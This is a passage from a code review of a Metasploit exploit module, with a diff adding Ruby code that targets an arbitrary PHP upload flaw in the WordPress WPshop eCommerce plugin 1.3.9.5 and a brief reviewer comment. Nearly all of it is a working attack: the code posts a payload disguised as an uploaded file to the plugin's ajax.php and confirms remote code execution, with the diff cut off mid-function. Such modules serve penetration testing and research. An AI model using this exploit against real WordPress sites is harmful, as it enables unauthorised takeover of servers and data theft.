modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb

```diff
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress WPshop eCommerce Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress WPshop eCommerce plugin,
+        version 1.3.9.5. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'g0blin', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['WPVDB', '7830'],
+          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
+      'DisclosureDate' => 'Mar 09 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wpshop', '1.3.9.6')
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(5 + rand(5)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'uri'       => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    )
+
+    if res
+      if res.code == 200 && res.body =~ /#{php_pagename}/
+        print_good("#{peer} - Our payload is at: #{php_pagename}.")
+        register_files_for_cleanup(php_pagename)
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'ERROR')
```

Comment:
Oh, sorry. I had seen this and actually I forgot to change to a more descriptive message. Thank you @wchen-r7. :+1: